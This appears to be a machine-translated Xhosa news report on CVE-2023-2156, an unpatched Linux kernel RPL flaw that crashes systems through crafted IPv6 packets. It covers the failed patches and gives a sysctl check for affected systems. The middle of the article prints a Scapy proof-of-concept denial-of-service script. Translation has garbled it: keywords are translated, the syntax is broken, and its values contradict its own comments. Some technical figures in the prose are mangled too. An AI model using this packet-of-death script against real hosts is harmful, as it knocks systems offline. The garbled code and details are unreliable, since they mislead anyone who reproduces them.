Ulwazi luye lwabhengezwa malunga nobuthathaka obungalungiswanga (0-day) (CVE-2023-2156) kwi-Linux kernel, evumela ukumisa inkqubo ngokuthumela iipakethi ze-IPv6 ezenziwe ngokukodwa (ipakethi-yokufa). Ingxaki ibonakala kuphela xa inkxaso ye-RPL (i-Routing Protocol ye-Low-Power kunye ne-Lossy Networks) ivuliwe, ekhutshaziwe ngokungagqibekanga ekuhanjisweni kwaye isetyenziswe ngokukodwa kwizixhobo ezifakwe kwiinethiwekhi ezingenazintambo kunye nokulahlekelwa kwepakethi ephezulu.
Ukuba sesichengeni kubangelwa kukulungiswa okungachanekanga kwedatha yangaphandle kwikhowudi yokwahlulahlula iprotocol ye-RPL, ekhokelela ekungaphumeleli kwe-assert kunye ne-kernel ukuya kwimeko yoloyiko. Xa ubeka idatha efunyenweyo ekwahlulahluleni IPv6 RPL iheader yepakethe kwi-k_buff (Socket Buffer) isakhiwo, ukuba intsimi ye-CmprI imiselwe ku-15, intsimi ye-Segleft ukuya ku-1, kunye ne-CmprE ukuya ku-0, i-48-byte vector enedilesi iyancipha. ukuya kwi-528 bytes kwaye ibonakala imeko apho imemori eyabelwe isithinteli ayonelanga. Kule meko, umsebenzi we-skb_push, osetyenziselwa ukutyhala idatha kwisakhiwo, uhlola ukungenakulinganiswa phakathi kobukhulu bedatha kunye ne-buffer, ukuvelisa imeko yokwesaba ukukhusela ukubhala ngaphaya komda we-buffer.
Umzekelo wokuxhaphaza: # Siza kusebenzisa iScapy ukwenza ipakethi kwi-scapy.all import * import socket # Sebenzisa IPv6 kujongano lweLAN yakho DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Sisebenzisa iisokethi ukuthumela ipakethe sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft the packet # Type = 3 yenza le RPL ipakethe # Iidilesi zineedilesi ezi-3, kodwa ngenxa yokuba iCmprI ina-15, # i-octet nganye yeedilesi ezimbini zokuqala iphathwe njengedilesi ecinezelweyo # Segleft = 1 ukuqalisa i-amplification # lastentry = 0xf0 ibeka i-CmprI ukuya kwi-15 kunye ne-CmprE ukuya ku-0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(uhlobo=3, iidilesi:= :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Thumela le pakethi ingendawo sockfd.sendto(bytes(p), (DST_ADDR, 0))
Kuyaphawuleka ukuba abaphuhlisi be-kernel baye baziswa malunga nokuba sesichengeni emva ngoJanuwari 2022 kwaye kwiinyanga ezili-15 ezidlulileyo baye bazama ukulungisa ingxaki kathathu, bekhupha iipetshi ngoSeptemba 2022, Oktobha 2022 kunye no-Aprili 2023, kodwa ixesha ngalinye ukulungiswa akwanelanga kwaye ukuba sesichengeni akukwazanga ukuphinda kuveliswe. Ekugqibeleni, iprojekthi ye-ZDI, elungelelanise umsebenzi wokulungisa ubuthathaka, yagqiba ekubeni ikhuphe ulwazi olucacileyo malunga nobuthathaka ngaphandle kokulinda ukulungiswa kokusebenza ukuba kufumaneke kwi-kernel.
Ngoko ke, ukuba sesichengeni kuhlala kungalungiswanga. Ngokukodwa, i-patch efakwe kwi-6.4-rc2 kernel ayisebenzi. Abasebenzisi bayacetyiswa ukuba bajonge ukuba iprotocol ye-RPL ayisetyenziswanga kwiinkqubo zabo, enokwenziwa kusetyenziswa umyalelo sysctl -a | grep -i rpl_seg_enabled
umthombo: opennet.ru